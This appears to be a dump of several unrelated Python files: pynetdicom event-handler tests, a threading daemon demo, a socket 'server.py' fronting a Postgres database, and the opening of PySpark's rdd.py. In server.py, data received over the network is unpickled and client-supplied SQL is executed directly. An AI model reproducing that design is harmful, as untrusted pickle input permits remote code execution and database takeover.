assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_RELEASE)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_ap_abort(self):
"""Test A-P-ABORT with EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_requested_context(Verification)
ae.add_supported_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False)
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
child = scp.active_associations[0]
child.acse.send_abort(0x02)
while scp.active_associations:
time.sleep(0.05)
assert assoc.is_aborted
assert len(triggered) == 2
event = triggered[1]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[1].primitive, A_P_ABORT)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_bind(self):
"""Test binding to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo(msg_id=12)
assoc.bind(evt.EVT_ACSE_RECV, handle)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo(msg_id=21)
assoc.abort()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 0
scp.shutdown()
def test_acse_recv_unbind(self):
"""Test unbinding to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc.send_c_echo(msg_id=12)
assoc.unbind(evt.EVT_ACSE_RECV, handle)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_raises(self, caplog):
"""Test the handler for EVT_ACSE_RECV raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_ACSE_RECV' event handler"
" 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
|
threading_setDeamon.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:Lyon
import threading
import time
def run(name):
print("I am %s" % name)
time.sleep(2)
print("When I'm done, I'm going to keep talking...")
if __name__ == '__main__':
lyon = threading.Thread(target=run, args=('Lyon',))
kenneth = threading.Thread(target=run, args=('Kenneth',))
lyon.setDaemon(True)
lyon.start()
kenneth.setDaemon(True)
kenneth.start()
time.sleep(5)
print("I was the main thread, and I ended up executing")
|
server.py
|
import socket
import pickle
import threading
from psycopg2 import connect
from dotenv import load_dotenv
from os import environ
# Client -> Server: Fixed + Custom Size (SQL arguments are unknown)
HEADER_FIX_SIZE = 2
# Server -> Client: Fixed Size, no SQL arguments
HEADER_FEEDBACK_SIZE = 5
BUFFER = 1024
APP_IP = ""
APP_PORT = 1248
FORMAT = "utf-8"
whitelist = []
desc_list = []
db_connector = None
db_cursor = None
# setting up the database
def connect_to_database():
global db_cursor, db_connector
try:
print("Trying to get .env data...")
load_dotenv()
database_url = environ.get("HEROKU_POSTGRESQL_BLUE_URL")
password_db = environ.get("password_db")
user_db = environ.get("user_db")
name_db = environ.get("name_db")
port_db = environ.get("port_db")
db_connector = connect(str(database_url), user=str(user_db), port=port_db, dbname=str(name_db),
password=str(password_db))
db_cursor = db_connector.cursor()
except KeyError as e:
print(f"ERROR: {e}. Program to be terminated.")
exit()
else:
print("Loaded .env from the system path.")
# Functions
def update_whitelist():
global whitelist, desc_list
db_cursor.execute("SELECT ip, description FROM ew_ips")
whitelist, desc_list = zip(*db_cursor.fetchall())
def update_ip():
global APP_IP
hostname = socket.gethostname()
APP_IP = socket.gethostbyname(hostname)
print(f"debug ip: {APP_IP}")
def handle_data(client_socket, address):
try:
idx = whitelist.index(address)
except ValueError:
client_socket.sendall(bytes("Access was denied. Contact with the creator of the tool for help.", FORMAT))
client_socket.close()
return
else:
print(f"Connection from {address} aka {desc_list[idx]} has been established")
full_data = b""
new_msg = True
msg_len = -1
header_custom_size = 0 # placeholder value
headers_sizes = [] # list of integers, data + SQL args if relevant
# getting the data
while True:
p_data = client_socket.recv(BUFFER) # bytes type
# handling the header
if new_msg:
header_custom_size = int(p_data[:HEADER_FIX_SIZE].decode(FORMAT)) # int, constant
headers_sizes = pickle.loads(p_data[HEADER_FIX_SIZE:HEADER_FIX_SIZE + header_custom_size]) # a list
if len(headers_sizes) == 2:
msg_len = sum(headers_sizes)
else:
msg_len = headers_sizes[0]
# checking for the end
if len(p_data) <= 0:
if len(full_data) - (HEADER_FIX_SIZE + header_custom_size) == msg_len:
print("Transfer succeeded")
elif len(full_data) - (HEADER_FIX_SIZE + header_custom_size) > msg_len:
print(f"ERROR: Incorrect header setting, received data too long.\n"
f"Custom size: {header_custom_size} for value: {headers_sizes}\n"
f"String of the data: {pickle.loads(full_data)}")
client_socket.close()
return
else:
print(f"ERROR: Received data too short, possible connection issue or incorrect header setting.\n"
f"Custom size: {header_custom_size} for value: {headers_sizes}\n"
f"String of the data: {pickle.loads(full_data)}")
client_socket.close()
return
break
# removing the header, accumulating the data
if new_msg:
full_data = p_data[HEADER_FIX_SIZE + header_custom_size:]
new_msg = False
else:
full_data += p_data
# Preparing and using the data
if len(headers_sizes) == 2:
sql_request = pickle.loads(full_data[:headers_sizes[0]])
sql_arguments = pickle.loads(full_data[headers_sizes[0]:])
else:
sql_request = pickle.loads(full_data)
sql_arguments = set()
# taking requested data from the database
db_cursor.execute(sql_request, sql_arguments)
db_data = db_cursor.fetchall()
# serialising and sending back
ser_data = pickle.dumps(db_data)
client_socket.sendall(bytes(f"{len(db_data):<{HEADER_FEEDBACK_SIZE}}", FORMAT)+ser_data)
client_socket.close()
def main_loop():
# setting up connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True) # reconnecting?
s.bind((APP_IP, APP_PORT))
s.listen(5)
while True:
conn, address = s.accept()
thread = threading.Thread(target=handle_data, args=(conn, address))
thread.start()
# getting things started
connect_to_database()
update_whitelist()
update_ip()
main_loop()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import AutoBatchedSerializer, BatchedSerializer, NoOpSerializer, \
CartesianDeserializer, CloudPickleSerializer, PairDeserializer, PickleSerializer, \
UTF8Deserializer, pack_long, read_int, write_int
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
SQL_GROUPED_AGG_PANDAS_UDF = 202
SQL_WINDOW_AGG_PANDAS_UDF = 203
SQL_SCALAR_PANDAS_ITER_UDF = 204
SQL_MAP_PANDAS_ITER_UDF = 205
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _create_local_socket(sock_info):
"""
Create a local socket that can be used to load deserialized data from the JVM
:param sock_info: Tuple containing port number and authentication secret for a local socket.
:return: sockfile file descriptor of the local socket
"""
port = sock_info[0]
auth_secret = sock_info[1]
sockfile, sock = local_connect_and_auth(port, auth_secret)
# The RDD materialization time is unpredictable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
return sockfile
def _load_from_socket(sock_info, serializer):
"""
Connect to a local socket described by sock_info and use the given serializer to yield data
:param sock_info: Tuple containing port number and authentication secret for a local socket.
:param serializer: The PySpark serializer to use
:return: result of Serializer.load_stream, usually a generator that yields deserialized data
"""
sockfile = _create_local_socket(sock_info)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def _local_iterator_from_socket(sock_info, serializer):
class PyLocalIterable(object):
""" Create a synchronous local iterable over a socket """
def __init__(self, _sock_info, _serializer):
port, auth_secret, self.jsocket_auth_server = _sock_info
self._sockfile = _create_local_socket((port, auth_secret))
self._serializer = _serializer
self._read_iter = iter([]) # Initialize as empty iterator
self._read_status = 1
def __iter__(self):
while self._read_status == 1:
# Request next partition data from Java
write_int(1, self._sockfile)
self._sockfile.flush()
# If response is 1 then there is a partition to read, if 0 then fully consumed
self._read_status = read_int(self._sockfile)
if self._read_status == 1:
# Load the partition data as a stream and read each item
self._read_iter = self._serializer.load_stream(self._sockfile)
for item in self._read_iter:
yield item
# An error occurred, join serving thread and raise any exceptions from the JVM
elif self._read_status == -1:
self.jsocket_auth_server.getResult()
def __del__(self):
# If local iterator is not fully consumed,
if self._read_status == 1:
try:
# Finish consuming partition data stream
for _ in self._read_iter:
pass
# Tell Java to stop sending data and close connection
write_int(0, self._sockfile)
self._sockfile.flush()
except Exception:
# Ignore any errors, socket is automatically closed when garbage-collected
pass
return iter(PyLocalIterable(sock_info, serializer))
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The :class:`SparkContext` that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (`MEMORY_ONLY`).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (`MEMORY_ONLY`).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self, blocking=False):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
.. versionchanged:: 3.0.0
Added optional argument `blocking` to specify whether to block until all
blocks are deleted.
"""
self.is_cached = False
self._jrdd.unpersist(blocking)
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with :meth:`SparkContext.setCheckpointDir` and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
`spark.dynamicAllocation.cachedExecutorIdleTimeout` to a high value.
The checkpoint directory set through :meth:`SparkContext.setCheckpointDir` is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements ``(a, b)`` where ``a`` is in `self` and
``b`` is in `other`.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
